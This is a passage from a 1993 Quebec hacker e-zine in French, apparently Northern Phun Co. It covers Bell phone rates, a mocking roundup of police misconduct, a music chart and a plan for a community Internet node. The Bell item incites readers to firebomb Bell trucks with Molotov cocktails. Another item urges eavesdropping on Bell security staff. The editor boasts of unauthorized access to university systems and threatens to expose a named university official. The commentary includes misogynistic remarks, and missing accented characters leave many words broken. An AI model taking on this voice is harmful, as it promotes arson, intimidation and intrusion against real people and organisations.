cause de leur situation de monopole ou de
quasi-monopole. Un service essentiel ne peut pas et ne doit pas
tre soumis aux lois ordinaires du systme capitaliste. Et ceux
qui ne croient pas que le tlphone soit un service essentiel,
fuck you and get the fuck out of here. Le tlphone est aussi
essentiel que l'lectricit...
J'espre que vous vous joindrez
nous pour considrer les
actions mercantiles de Bell comme intolrables, et que vous nous
aiderez
demeurer vigilants. Aprs tout, il y aura toujours un
twit pour tenter de taxer l'air qu'on respire...
------
Bell revient
la charge avec son ide de facturer le
service local
l'appel. Prparons-nous
s'en faire passer une
petite vite, les amis! Qubec Tlphone, qui vient de dposer ses
demandes
la hausse (2,3% au lieu de 1,4%) se dirige elle aussi,
lentement, mais srement, vers une tarification
l'utilisation
pour remplacer le tarif de base. Et qu'allons-nous faire?
Qu'allons-nous dire, mes amis? Vous vous imaginez, avec le nombre
de minutes que vous passez sur les babs
chaque mois? Il va
falloir prparer une parade, les mecs. On va bien sr attendre
les dpts des demandes devant le CRTC, et envoyer un mmoire
mais, vous nous connaissez, ce n'est pas assez.
Ce qu'il faut faire, c'est de leur faire mal l
o a
compte: dans le porte-monnaie. Moi, j'ai pour mon dire que pour
chaque dix dollars de plus sur ma facture, il y a un camion de
Bell ou Qubec Tlphone qui flambe. Les cocktails Molotov, c'est
pas fait pour les chiens, et ces gens ont besoin d'une leon...
------
Un de nos lecteurs nous a crit pour nous dire que la rumeur
discute dans le dernier numro,
l'effet que Bell voulait
limiter les lignes tlphoniques normales
des transmissions de
4800 bauds
tait vraie. Il nous jure ces grands dieux que sa
ligne
lui est dj
barre. On va vrifier a ce mois-ci, dans
les moindres dtails, et on s'en reparle le mois prochain.
------
En parlant du dernier numro de NPC, vous vous souviendrez
qu'Atreid tournait en bourrique la dernire cration "songe" de
Bell, Ti-Guy Nouguette. On avait fait la preuve, en trois coups
de cuillre
pot, que c'tait compltement lame comme ide. Bell
n'a probablement pas apprci d'tre tourn au ridicule, parce
que le personnage est compltement disparu du Journal Bell, une
semaine aprs la parution de l'article d'Atreid! Et pour ne pas
revenir, semble-t-il. Yo! Prenez pas a comme a, messieurs les
rdacteurs! Si vous voulez des bons articles sur le piratage.
engagez-nous, on va faire tripper vos lecteurs!
------
Avis
nos lecteurs de Montral: le Regroupement des
secrtaires Bell (RSB) organise, le 6 octobre, une causerie
intitule "Parlons Scurit". L'orateur sera Denis Lamothe, de la
Sret du Bell. ca va se passer
l'auditorium du 1050, cte du
Beaver Hall. Si vous ne pouvez pas vous glisser dans la salle,
sachez que c'est suivi ensuite d'un souper chez la Mre Tucker.
Et un restaurant, c'est un lieu public idal pour couter aux
tables voisines... Je veux un rapport en trois exemplaires!
------
Le ministre des communications (pas pour longtemps!) Perrin
Beatty a dpos un projet de loi, devant le parlement (sur la
pelouse! -grin-) en vue de crer un nouvel organisme, financ et
dirig entirement par le priv (donc, par les compagnies de
tlcommunications), qui s'appelerait TELECOMMUNICATIONS PRIVACY
PROTECTION AGENCY. Cet organisme serait sens voir
ce que
toutes les compagnies de cellulaire (entre autres), fournissent
dsormais
leurs clients des communications "scures" (lire:
encryptes). Ca. c'est le but avou de l'organisme. Mais qui nous
dit qu'il n'ont pas un "agenda secret"? Est-ce vraiment une bonne
ide de laisser entre les mains des telcos le soin de grer at
large tout le domaine de la communication sans fil? Je ne crois
pas: comment nous, simples citoyens, aurons-nous le contrle sur
ces organismes, s'ils n'ont pas
rpondre au gouvernement?
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
BONJOUR LA POLICE!
Les conneries mensuelles des forces de l'ordre
par THX 1138
Ouais, au rythme o a va, cette chronique n'est pas prs de
manquer de matriel... grce
nos admirables dfenseurs de la
loi et de la justice. On a mme t oblig de laisser tomber les
conneries qu'ils font au States: juste avec le Qubec, on fait
notre 50K...
Un qubcois, Jacques Emond, 37 ans, vient finalement d'tre
captur par la GRC de Vancouver. En soi, rien d'extraordinaire,
sauf que... sauf que l'assistant-directeur du service de
renseignement criminel de la GRC, l'inspecteur Claude Savoie, est
"un peu" reli
cette affaire. Savoie s'tait flingu dans son
bureau d'Ottawa, en dcembre dernier, alors que des officiers des
affaires internes attendaient pour le rencontrer. On voulait tout
simplement lui demander s'il connaissait, par hasard, des membres
de la pgre, s'il ne les protgeait pas, s'il ne les rencontrait
pas, etc... On ne connatra jamais les vraies rponses, of course
(une balle dans la tte est-elle un aveu de culpabilit?). Le
"suicide" de Savoie en arrangeait plusieurs, puisque plusieurs
corps policiers des States et du Canada trempaient dans cette
affaire. Peut-tre l'arrestation de Jacques Emond EN SOL CANADIEN
nous permettra d'en savoir plus... et peut-tre pas car,
curieusement, on pense srieusement
l'expdier immdiatement
aux tats, o il est recherch, sans le questionner sur
l'implication de la GRC... Ca aussi, a arrangerait ben du
monde... En passant, Emond est le prsident de la branche
qubcoise des Hell's. Et, au moment o j'cris ces lignes, on ne
l'a pas encore retrouv pendu avec ses lacets de bottine, lui
coupant le sifflet
tout jamais.
En passant, il parat que la GRC s'apprte
envoyer un
important contingent d'agents en Haiti, afin qu'ils apprennent la
technique des tontons-macoutes.. Eh.. C'est pas a du tout, c'est
plutt pour voir
ce que le "retour
la dmocratie" se fasse
sans violence. Donnez-nous une adresse, et on va vous expdier
NPC l
-bas. Et puis, vous tes pas obligs de revenir, vous
savez...
Cette mme GRC se prapre
subir des coupures. En effet, le
commaissaire responsable de la GRC, Norman Inkster, vient de
mettre sur pied une brigade spciale charge de voir comment on
pourrait couper $69,6 millions
cet gang d'enquiquineurs.
Jusqu'
date, la seule ide qui leur tait venue, l'orchestre et
les clowns
chevaux qui donnent des spectacles
Ottawa. Si vous
coupez l'orchestre, comment allez-vous faire face
la musique?
La police du tabac du ministre du Revenu du Qubec
souponne son preopre personnel de frauder. En effet, le rcent
vol de 762 caisse de cigarettes
un entrept "secret" (valeur:
800 000$) de Pointe-Claire ne peut tre qu'un coup de
l'intrieur, croit-on.
Un voleur apprhend par la police de Qubec aurait russi,
les mains attaches DERRIþRE le dos,
subtiliser l'arme d'un des
policiers (un .357! Vous savez comment c'est gros , cette arme-
l
?), et
se tirer un coup de feu dans la jambe. Tout seul comme
un grand garon! Commentaire de l'agent Camille Gagnon, de la SQ:
"De toute vidence, il semble que l'arme a t sortie de l'tui
au moment o le suspect a t menott. CA L'AIR BIZARRE, mais
c'est plausible!"... Commentaire du gnral Blitzkreig, de la
NPC: "C'est peut-tre plausible, mais crisse que a a l'air
bizarre!"
Dernire heure! La Surt du Qubec a clos son enqute,
aprs quelques jours de taponnage, et dcid qu'aucune accusation
de serait porte. Contre personne. C'est encore plus louche, non?
Le policier bless ne porterait pas d'accusation contre le bandit
qui lui a brl les mains? Comme il est gentil... Du ct du
voleur, c'est un peu plus difficile. La SQ a en effet boucl son
enqute sans avoir entendu sa version de la chose, puisqu'il est
encore dans le coma, je crois.
Les constables Maryse Cliche, 26 ans, Richard Tardif, 27
ans, et Sylvain Lacasse, 28 ans, de la Surt du Qubec,
Candiac, viennent d'tre traduits en cours. Les charges: assaut
avec blessures, assaut avec une arme, menaces de mort, et
utilisation dangereuse d'une arme
feu. Trois hommes de la Rive
Sud ont t les prsumes victimes de ces policiers, qui les ont
forc
se dshabiller au complet,
l'extrieur,
-20 degrs,
une arme braque sur leur tte. Les policiers ont ensuite coup
les cheveux d'un des hommes, et les ont battus, en les menaant
toujours de leur arme. Get this: les trois victimes taient
srement des criminels, non? AUCUNE charge n'a t retenue contre
eux. Juste 3 flics qui s'amusaient un peu... Et ils sont encore
en poste.
Nous vous avions parl le mois dernier du flic de Qubec qui
avait t accus d'avoir vol un sac
main lors d'une descente.
Nous avons maintenant son nom: Michel Ruel, 31 ans, du district
de Beauport. Le lieu de l'infraction: le bar de danseuses le
Balzac. La victime: une danseuse. Apparemment, ce n'tait pas
lors d'une descente, car le policier n'tait pas en fonction
ce
moment-l
. Juste un pervers tranquille qui n'aime pas PAYER pour
faire "danser" les filles
sa table.
Le sergent Serge Lemieux, de la police de Sillery, vient
d'tre grond par le comit de dontologie policire, pour
fouille illgale d'un vhicule. Il avait manifest un "intrt"
certain pour la camra vido pose sur le sige arrire du
vhicule de la victime...
L'agent Rjan Vzina, de la police de Ste-foy, vient d'tre
lui aussi admonest par le comit de dontologie. Pour avoir tap
sur un mari qui battait sa femme. Il avait pas tort, dans le
fond...
Jacques Lapierre, de la police municipale de Joliette, est
accus d'avoir fait des appels obscnes et profr des menaces de
mort
l'endroit de deux femmes. Lapierre a, depuis cet incident,
donn sa dmission (ou peut-tre l'y a-t-on invit?).
Les agents Jean Cadieux, matricule 27, et Stphane Dussault,
matricule 34, ont t "condamns"
une rprimande par le Comit
de dontologie policire, pour atteinte aux droits fondamentaux,
avoir utilis une arme sans discerment et tre netr illgalement
dans une rsidence de Boisbriand. Les deux policiers municipaux
de Boisbriand ont, semble-t-il, pntr brusquement dans une
rsidence prive, arme au poing, et on menott un des rsidents,
un mineur, Dan Mercier. Celui-ci devait avoir l'air dangereux,
pour qu'on le traite ainsi. Hey! Un kid de 15 ans qui brandit,
peut-tre, une copie de NPC!
L'agent Christian Sauriol, de la police de Ste-Hyacinthe, a
t suspendu sans traitement pour deux jours et
subi une
rprimande pour avoir tenu un langage injurieux et avoir abus de
son autorit dans ses rapports avec un certain Yannick Bessette.
L'histoire ne dit pas ce qu'il a fait, mais srement qu'il devait
chanter dans son bain...
Allan Gosset, policier de la SPCUM, devra subir un nouveau
procs pour la mort de Anthony Griffin. Ainsi vinet d'en dcider
la Cour suprme. Vous vous rappellerez que Griffin, un jeune
noir, avait t arrt par la police pour refus de payer une
course de taxi. Lorsqu'il a tent de s'enfuir, Gosset lui a tir
dans le dos, pour dclarer ensuite que "la balle tait partie
accidentellement". Gosset a, depuis, t mis
la retraite.
Alice Clark, poursuit son ex-employeur, la GRC, pour bris de
contrat et violation de ses droits fondamentaux. Clark, 36 ans,
travaillait au bureau de la GRC de Red Deer, en Alberta, et tait
la proie du sexisme de ses collgues. Aux insultes verbales
s'ajoutaient des cas d'attouchements sexules. De plus, les agents
males de la GRC passaient leur temps
couter des vidos pornos
leur bureau, au grand dsarroi des femmes du bureau. La
situation est devenue telle qu'ewlle n'a eu d'autre choix que de
dmissionner. Srement que les vidos que les hommes coutaient
avaient rapport avec une enqute...
Peter West, un officier de la police provinciale de l'Ontario, a
t suspendu de sa job, sans salaire, pour la dure du procs
qu'il doit subir. West est accus d'harclement sexuel
l'endroit de collgues de travail.
Le constable Robert Plante, de la police municipale de
Mascouche et Lachenaie, est prsentement devant les tribunaux.
Plante est accus d'avoir interfr avec le travail d'un
huissier, Sylvain Trudel, et de l'avoir menac de lui arrach la
tte et de lui briser le nez. Deux choses: voulait-il lui briser
le nez AVANT ou APRES lui avoir arrach la tte? Et puis,
tabasser un huissier n'est pas vraiment un crime, n'est-ce pas?
Un huissier, c'est encore plus bas, dans l'chelle de
l'volution, qu'un flic...
Michel Bourdon, un policier de la SQ
St-Jean sur le
Richelieu, a t suspendu de ses fonctions aprs avoir t accus
d'avoir battu sa femme. Bourdon, 35 ans, lui aurait entre autres
inflig une fracture du nez et une fracture du sternum. Ca lui
apprendra
faire de l'excs de vitesse dans l'entre du garage!
Sept policiers de la ville de Qubec comparaissaient, ce
mois-ci, devant le comit de dontologie policire. Carol
Marceau, Albert Beaulieu, Dany Chartier, Andr Ltourneau et
Magella Poirier, Jean-Yves valle et Richard Verret ont
lgrement tabass un prvenu, Mario Jobin, lgrement tran
dans quelques escaliers, et lgrement dchir ses vtements. Il
faut dire que Jobin l'avait cherch: il voulait contacter son
avocat avant de passer un alco-test. Vouloir exercer ses droits:
c'est de la vraie provocation!
Un policier de Rimouski, Ghislain Martin, sera probablement
condamn
dix jours de suspension par le comit de dontologie.
Martin avait pogn des jeunes en train de siroter une bire
derrire une arcade. L'un deux, aprs avoir vid,
la demande
des policiers, les bires par terre, a voulu rcuprer les
bouteilles vides pour les ramener au dpanneure le policier s'est
jet sur ce dangereux individu, ag de 14 ans, et lui a caliss
une vole. Un autre qui va apprendre que c'est les policiers qui
ramassent les vides pour les revendre! Les jeunes, a se croit
tout permis, mme de recycler!
On avait dit: pas de policiers US ce mois-ci, mais lui,
il est incontournable! Un policier de la ville de New-York
corrompu jusqu'
l'os, Michael Dowd a tmoign ce mois-ci devant
la commission Mollen, appointe par le maire, pour tudier la
corruption policire. Dowd et plusieurs de ses collgues ont t
arrts par la police de Long Island. En fait, il s'agirait d'une
bande d'une QUINZAINE de policiers. Ils remettaient aussi en
circulation des armes confisques. Ces olibrius se faisaient plus
de $4000 dolars par semaine, chaques, en ranonnant les dealers
de drogue ou en leur volant leur stock et en le revendant, et ce
durant une bonne diziane d'annes. Dowd admet aussi qu'il buvait
et consommait de la dope alors qu'ilk tait en service. Lorsque
le juge lui a demand ce que son confrre de patrouille disait
lorsque Dowd se faisait des lignes sur le dash de la voiture d
epolice, il a rpondu: "Il tait content quand je me faisais une
ligne, parce qu'il savait que je serais de bonne humeur, et que
je pourrais mieux me concentrer".
Et le petit article, pour finir, parce que a le gacherait
si on tentait de le rsumer...
Leeched from LE JOURNAL DE MONTRAL - Vendredi 3 septembre 1993
RIEN DE PIRE QUE LA BONNE BUREAUCRATIE POLICIERE...
par Rodolphe Morissette
Mme quand les policiers de Montral, sous prtexte de
"moyens de pression" envers leur employeur, ne rpondent plus
qu'aux appels urgents, il reste toujours de la place pour de la
bonne bureaucratie policire. Une citoyenne de Montral dans la
mi-vingtaine, Isabelle Lalibert, l'a appris
ses dpends le 8
juillet dernier.
Mme Lalibert devait comparatre en Cour municipale
la mi-
juin. On lui reprochait d'avoir accroch avec sa voiture une
barrire dans un parc de stationnement municipal. A tort, elle a
penms qu,elle devait se rendre, pour cette comparution, au
Palais de justice. Ici, on l'informe de son erreur. Elle court
donc
la Cour municipale. Elle apprend, en y arrivant, que le
juge a dj
mis contre elle un mandat d'amener parce qu'elle
n'tait pas l
l'heure prvue.
(Blitz- Ca commence bien, une femme au volant! Et le juge qui
reproche
cette bougresse de ne pas tre l
l'heure prvue:
comme si les femmes n'taient jamais en retard!)
Ne sachant trop que faire, elle communique avec un bureayu
d'aide juridique. On lui suggre de se rendre, avant 7 heures du
matin,
un poste de police et de s'expliquer. On vous fera
comparatre devant un juge avant 11 heures et l'affaire sera
rsolue, ajoute la prpose
l'accueil. Elle se prsente donc au
poste 33
l'aube du 8 juillet, jour choisi par la Fraternit des
policiers pour retirer ses patrouilleurs des rues -illgalement,
selon la Loi sur la police- afin de presser l,employeur de ne
point geler leur salaires.
(Blitz- Deuxime erreur de la bougresse: couter une
fonctionnaire de l'aide juridique. Comme si une fonctionnaire
savait de quoi elle parle!)
Au comptoir, l'agent Stphane Brosseau l'accueille. Il
l'arrte poliment, comme il se doit, et la place en cellule. Mme
Lalibert constate que tous les autres policiers du poste sont en
vtements civils d't et s'apprtaient
monter dans un bus
"comme s'ils allaient
un party". (...) Elle devra passer
cause de a toute la journe, puis toute la nuit en prison. Pour
la sustenter
midi, on lui refile un "casseau" de frites (mais
pas de beigne). Pour souper, on lui offre un coca, des frites et
un hot-dog (sans beigne). A 21h30, on la transfre au quartier
gnral de la rue Bonsecours, o elle poireautera jusqu'
minuit
dans la file des dtenus avant d'avoir une cellule. Sance de
photo et de bertillonnage en prime. Elle comparat enfin le
lendemain et le juge la relve de son mandat. (...)
En Cour suprieure, elle rclame de la CUM une compensation
de 15 000$ pour incarcration illgale, plus 10 000$ pour
dommages moraux.
- 30 -
KILL THE COP IN YOUR HEAD!
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
PALMARES AMBIENT - TRANSE - CHILL OUT
par Genghis Dan
Groupe Album Pice Etiquette
Dreamfish Dreamfish Hymn Rising High Rec.
RSNCD9
Biosphere Mycrogravity Baby Satellite AMBCD3921
Silence Silence Sontur (!?!) PK 08\25
Sabres of "12" Smokebelch PT 009
Paradise
Pulse "12" at a new New Place Rising High
Place Hart UK15
--------------
Le 13 novembre, un super rave s'en vient! The biggest yet!
Et pour clbrer le premier anniversaire de NPC, encore!
D'ailleurs, les NPC seront l
, ordis plogus sur cran gant,
vous amener dans le cyberspace toute la soire! Watch for it!
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
LA NAISSANCE DE L.L.C.
par Blitzkreig
Bon... coutez-moi bien, bande de mcrants. Le moment est
venu de mettre votre argent l
o votre bouche est. En d'autres
termes: dsirez-vous un acompte lgal sur Internet, avec TOUS les
services et 2 megs d'espace personnel, pour trente dollars par
mois? Un acompte lgal, honest to goodness lgal, o vous n'aurez
plus
regarder par dessus votre paule pour savoir s'il n'y a
pas un sale flic qui vous loggue dans le moment, un acompte o
vous n'aurez pas
vous faire chier pour installer IRC, WAIS,
WWW, et tout le reste. Un acompte qui vous appartient, avec votre
nom ou votre handle suivi du clbre "A" commercial et de
NPC.ORG. Un acompte qui va tre protg envers et contre tous,
parce que la fable du cordonnier mal chauss, trs peu pour nous:
ce systme va tre,
toutes fins pratiques, inviolable, car
notre rputation serait en jeu. Un acompte o vous pouvez par
contre faire tout ce qui vous chante, et o on ne posera pas de
questions... mais o on va plutt vous donner des conseils, si
vous voyez ce que je veux dire...
En voulez-vous un acompte comme a? Nous aussi, chez NPC, on
en veut un, et pour tout le monde. Et on travaille en ce sens.
L'tape numro un, c'tait d'aller voir le king du coin, celui
qui possde la seule node
Qubec, l'Adversit Laval. J'ai
personnellement crit au directeur du CTI (Centre de Traitement
Informatique) de Laval, avec copie au recteur himself, esprant
les gagner avec des arguments conomiques. D'ailleurs, voici
copie de la lettre...
M. Grard Pelchat,
directeur du CTI
Universit Laval
Cher monsieur,
vous n'tes pas sans savoir que l'Universit Laval, aux
dires des administrateurs d'Internet, est une des rares
dtentrices d'une node "publique" Internet, justement, de la
rgion de Qubec. Ceci vous honore, car je connais beaucoup
d'universits qui hsitent encore, de par ce vaste pays qui est
le ntre,
offrir un service aussi essentiel
son personnel et
ses tudiants!
Mais que je me prsente: mon alias lectronique est
Blitzkreig, et je suis l'diteur d'un petit fichier texte
mensuel, qui porte le nom de Northern Phun Co. Ce magazine,
distribu gratuitement sur plusieurs babillards publics de la
province, traite d'informatique... alternative... (piratage est
un si vilain mot!). Les centaines de lecteurs que nous possdons
dans la rgion de Qubec nous posent souvent la question: comment
fait-on pour entrer sur Internet? Et nous de leur rpondre: la
seule node
Qubec,
notre connaissance, est
l'U.L.... mais
elle n'est pas donne...
J'ai rcemment eu l'occasion de jeter un coup d'oeil sur
votre "liste des prix", et les cheveux m'ont dress sur la tte.
Pour un usage normal d'Internet, c'est-
-dire une heure de IRC
par jour, un peu de FTP, quatre ou cinq megs d'espace disque, une
adresse pour le e-mail, je paierais en Californie (NETSYS.COM)
vingt dollars par mois. A New York, chez Mindvox, a ne me
coterait que 15$ par mois. Mais
Qubec, si je me fie
votre
liste des prix, la facture monterait
90$ dans le temps de le
dire... Ce que voyant, la plupart des gens que je connais,
incapables de dbourser cette somme, prfrent pirater votre
systme... gratuitement. Ne vous faites pas d'illusion: je
connais au moins une dizaine de personnes qui se promnent sur
vos VAX et vos Suns sous le couvert d'un acompte... emprunt.
Certes, ces gens sont des mcrants... qui prfreraient,
s'il avaient le choix, payer pour avoir un acompte lgal. Mais
payer un juste prix... En consquence, j'aimerais ouvrir ici une
rflexion conjointe sur la possibilit de crer des comptes
spciaux. Je suis sr que l'Universit Laval, en bonne
gestionnaire qu'elle est, ne dsire pas perdre de l'argent en
offrant des services
des gens qui ne sont pas encore, ou qui ne
sont plus, des tudiants de ce haut lieu d'enseignement. Je suis
aussi persuad que l'Universit Laval ne condamne pas, et au
contraire encourage, la curiosit intellectuelle et la soif de
connaissance. Et vous, en tant qu'expert et usager d'Internet
(enfin, je l'espre pour vous!) comprendrez qu'un tel rseau, par
dfinition, devrait tre accessible au plus grand nombre.
Ces postulats poss, j'ai bien une solution
vous proposer,
et qui satisferait toutes les parties. Pourquoi ne pas mettre
la disposition du public un certain nombre d'acomptes
prix
rduit? Les conditions pourraient tre les suivantes:
- Accs
tous les services Internet (uniquement aprs les heures
de bureau -de 18 heures
6 heures- et la fin de semaine. Ainsi,
le systme ne serait pas congestionn, laissant le champ libre
pendant les heures de cours et d'affaires aux chercheurs et aux
tudiants pour qui cet accs est vital). Espace disque restreint
5 megs, le tout pour trente dollars par mois...
A mes yeux, ce trente dollars est de l'argent neuf qui
entrerait dans vos coffres. Vous payez votre lien Internet au
mois (et quelques communications en plus ne vous coteraient pas
un sou de plus), vos machines tournent mme lorsqu'il n'y a
personne dessus (pas de frais additionnels ici non plus), etc...
En somme, je vous offre ici un moyen de faire des sous sans avoir
faire de dbourss supplmentaires, et, qui plus est, la nuit,
alors que seuls les pirates se promnent sur votre systme,
pirates qui se sentiraient de facto responsables de leurs actes
plutt que victimes d'un capitalisme hont...
En effet, la plupart des jeunes qui dsireraient avoir un
accs LGAL
Internet pourraient payer cette somme. On parle ici
de kids au secondaire ou au cgep, pas de banquiers qui cherchent
"modemer" pendant leurs heures de loisirs... Des jeunes qui ne
cherchent pas
crasher votre systme, mais
entrer tout
simplement dans cette socit technologique de demain qu'on leur
fait miroiter.
J'apprcierais beaucoup connatre le fond de votre pense
ce sujet. Pour ce faire, laissez-moi un message sur mon
rpondeur, au 692-4711. Nous pourrons, si cela vous chante,
entamer un dialogue entre fervents de l'informatique et frus des
tlcommunications globales. Et, qui sait, peut-tre pourrais-je
vous donner quelques trucs pour protger votre systme de manire
plus scuritaire! ;-)
Blitzkreig,
diteur NPC
C.C: Michel Gervais
------------------------
Ces enfants de pute n'ont toujours pas daign nous rpondre.
Ils mriteraient que les systmes de l'Adversit se plantent
tout bout de champ, tiens! On a essay la manire lgale, on va
maintenant leur montrer de quel bois on se chauffe! Ben non, on
va pas perdre notre temps
se venger de tous ces misrables cons
(quoique, si vous voulez frapper un coup au nom de notre belle
jeunesse!). On va plutt partir notre propre node Internet
Qubec.
Mais ce $"&?&? de Pelchat va tout de mme sentir sa douleur,
faites-moi confiance. Plusieurs personnes du CTI ont des
squelettes dans leurs placards. Nous sommes peut-tre petits,
mais nous avons de la gueule et des espions, et a va chier, je
vous en fait le serment solennel...
Mais ceci est une autre histoire... Revenons
la cration
de notre propre node Internet. C'est ici que nous avons besoin de
vous. La ligne
elle seule (en 56,400 bauds) va nous coter
1000$ par mois. Et il faut que l'on achte un mainframe. Et un
paquet de bbelles, parce qu'on ne veut pas que LIBERT, LIBERT,
CHRIE! (a va tre le nom du site!) ressemble
un board
Internet du tiers-monde. Mais, pour faire rouler tout a, a nous
prend du monde qui vont accepter de payer trente dollars par mois
pour tre sur le site Internet le plus K-Rad et le plus co0l de
ce ct-ci du Rio Grande.
On ne veut pas que vous nous envoyiez de l'argent: on veut
juste que vous nous disiez si vous tes intresss, et que vous
teniez votre parole lorsque le site ouvrira, d'ici quelques mois
(on pense
deux mois, environ). Ouvrez maintenant vos oreilles
toutes grandes: on ne fait pas a pour faire du cash, bien au
contraire (on va probablement tre obligs de manger du baloney
pendant vingt mois, jusqu'
ce que la quincaillerie soit paye).
On ne fait pas a pour avoir un accs Internet
nous (nous
sommes NPC, et nous sommes dj
sur Internet). On fait a
uniquement pour vous donner un coup de main, vous donner
l'occasion de parvenir au sommet sans avoir
risquer de vous
faire pincer pour intrusion illgale sur un systme. Croyez-le o
non, la vue de tous ces kids, le nez coll sur la vitrine du
magasin de bonbons, contemplant les trsors qu'ils ne pourront
jamais s'offrir
cause de l'avarice de vieux crotons
universitaires, eh bien, a nous fait gerber, cette histoire.
Nous l'avons dj
prouv, je crois, avec notre revue: nous ne
sommes pas l
pour faire du cash sur votre dos,
l'image d'une
cochonnerie d'institution d'enseignement suprieur (que nous ne
nommerons pas <grin>); nous sommes l
uniquement pour vous aider,
et aider
btir une socit plus juste... La preuve est faite...
Cette offre est on ne peut plus srieuse: NPC veut oprer
une belle node Internet, accessible
tous, avant 1994. Mais pour
a, pour qu'on ne se casse pas la gueule en grand, pour qu'on ne
se crisse pas dans le trou pour les 20 prochaines annes, on a
besoin de votre appui. PAS DE VOTRE ARGENT, de votre appui. Si
vous tes intresss, faites-nous le savoir... et tenez ensuite
vos promesses.
Le choix est le vtre: o vous profitez de cette occasion
pour vous former en une espce de coop LGALE d'o seront exclus
tous les profiteurs, o vous nous laissez disparatre corps et
biens avec ce projet un peu fou. Mais si nous coulons avec
NPC.COM, vous risquez d'attendre le prochain imbcile prt
investir de l'argent
perte encore longtemps. C'est nous, o
vous allez scher pour les dix prochaines annes,
vous mordre
les doigts sur le fait qu'Internet vous est interdit
tout
jamais.
C'est maintenant ou jamais... You can talk the talk, but can
you walk the walk? Et puis, vous aurez remarqu, j'ai laiss mon
numro de tlphone personnel sur la lettre
l'autre truand.
Laissez un message d'encouragement sur ma box... Et laissez-nous
des messages sur les babs.
C'EST QUOI INTERNET?
Certaines personnes se demandent encore ce qu'est,
exactement, Internet. Certaines personnes se demandent ce qu'il y
a de plus sur Internet que sur un bab ordinaire, fut-il reli
FidoNet. Certaines personnes ne lisent manifestement pas NPC ;-)
Internet, c'est le rseau des rseaux. Au dtour de la
guerre froide, vers le dbut des annes 60, les Amerloques se
demandrent comment protger les ordinateurs militaires, relis
par un rseau appel Arpanet, en cas d'attaque nuclaire. Ils ont
conu une toile d'araigne, qui est devenue Internet, avec des
milliers de centres qui communiquent entre eux avec le mme
software. Ainsi, si une bombe tombait sur Philadelphie, seuls les
ordis de Philadelphie paralyseraient, et tous les autres se
"drouteraient" automatiquement pour viter le trou qu'il y
aurait maintenant
la place de Philadelphie.
Quelques annes plus tard, les chercheurs scientifiques
firent main basse sur le rseau, pour changer avec leurs
collgues. Et un peu plus tard encore, les universits
embarqurent dans ce projet qui, dj
, grossissait,
indpendamment de la volont de un ou de plusieurs individus. Le
chaos: c'est a Internet. Le chaos parce que Internet
n'appartient
personne, n'est dirig par personne. C'est
difficile
concevoir, je sais: un systme qui relie des
centaines de milliers de rseaux (militaires, scientifiques, etc)
et qui compte, au moment o je vous parle, plus de vingt millions
d'usagers, un tel systme et il n'appartient
personne? Ben oui!
Il y a bien un "conseil des anciens" qui met des suggestions,
sur les nouveaux programmes
utiliser, ou qui attribue les
adresses, mais mme eux n'ont pas autorit pour dcider ce qui
doit se passer avec Internet. C'est un peu comme une grosse
cooprative, finalement, o chacun fait sa part pour expdier les
packets d'information qu'il reoit vers une autre destination,
qui
son tour... Il y a bien une "police", le CERT (Computer
Emergency Response System), qui a pour mission de reprer les
fraudeurs (nous reviendrons tout
l'heure sur la fraude), mais
c'est tout.
Ca, c'tait une brve histoire. Maintenant, qu'est-ce qui
se passe sur Internet? Ben, il y a, nous l'avons dit, des
centaines de milliers de rseaux, ce qui reprsente des millions
d'ordinateurs, sur Internet. La plupart sont accessibles
gratuitement. Vous pouvez donc aller chercher des fichiers et de
l'information (on appelle a FTP en langage Net), partout
travers le monde. Si je fais une thse universitaire
Qubec,
par exemple, sur "L'influence du rave sur la culture de la
tomate", je peux aller fouiller
La Sorbonne (Paris),
CalTech
(Los Angeles), ou
des milliers d'universits
travers le
monde, pour examiner les dpts de thses, et voir si mon sujet
n'a pas dj
t abord.
Et puis, il y a IRC (Inter Relay Chat), qui est pas mal
pt. Tu peux, en temps rel,
n'importe quelle heure du jour ou
de la nuit, n'importe o
travers le monde, discuter avec des
milliers de personnes, sur n'importe quel sujet. Un chat avec la
plante entire, en temps rel, en groupe,
la vitesse de la
lumire! Tu peux mme changer des fichiers avec ces gens, sans
arrter la conversation,
des vitesses fantastiques (parce
qu'Unix permet le multi-tasking).
Et puis il y a Usenet, qui est une espce de banque de
messages sur un sujet donn, n'importe quel sujet, aussi arcane
soit-il, aussi obscur, aussi hallucin, etc...
Et puis il y a les MUDs. Multi User Dungeons. A quarante
dans un donjon et dragons simultanment, c'est mieux que SRE
tous les deux ou trois jours! Il y a environ 300 MUDs de par le
monde, accessibles gratuitement d'Internet. Le premier MUD a t
invent en 1979 en Angleterre. Je connais des gens qui sont
totalement addicts
la chose.
Et plein d'autres choses.... des livres
aller chercher,
des boards warez "gratuits" et illgaux, des conversations live
avec Billy Idol, Carl Sagan ou Arthur C. Clarke, des... des...
Parce que, en dehors du Qubec, tous ceux qui sont "quelqu'un"
sont sur Internet: Bruce Sterling, William Gibson, tous les
pirates informatiques internationaux, Stephen King, etc... Et tu
peux converser, envoyer un "finger" (ce n'est pas une insulte,
dans le langage Internet) ou poster un e-mail
la plante
entire. Ca prend en gros une vie, je crois, pour faire le tour
d'Internet et des possibilits qu'il offre. C'est aussi gros que
a! C'est aussi pt que a! C'est aussi fuck que a!
VOTRE PORTE D'ENTRE SUR INTERNET
"LIBERT, LIBERT CHRIE", la node qu'on veut partir, va
d'abord tre un babillard, qui va runner sur une grosse machine,
avec SIX lignes de tlphone en 16.8... Un babillard
international, comme si vous entriez sur Mdic, avec cinq autres
interlocuteurs locaux et quelques invits internationaux. Il va y
avoir tout ce qu'un autre babillard a, les jeux online en moins.
En plus de sa fonction de babillard support pour NPC, chaque
utilisateur va avoir un espace disque de 2 megs (on prvoit
acheter, au dbut, un 2 gigs). Pourquoi?
Il faut comprendre comment Internet marche. A la diffrence
d'un bab ordinaire, quand tu connectes sur LIBERT (LLC pour les
intimes), tu deviens en quelque sorte un terminal, et c'est
l'ordi de LLC, pas ton ordi chez toi, qui devient actif. Ainsi,
mme si tu communiques avec LLC en 1200, tu vas quand mme faire
du 56,400 sur Internet, et tu vas quand mme transfrer en
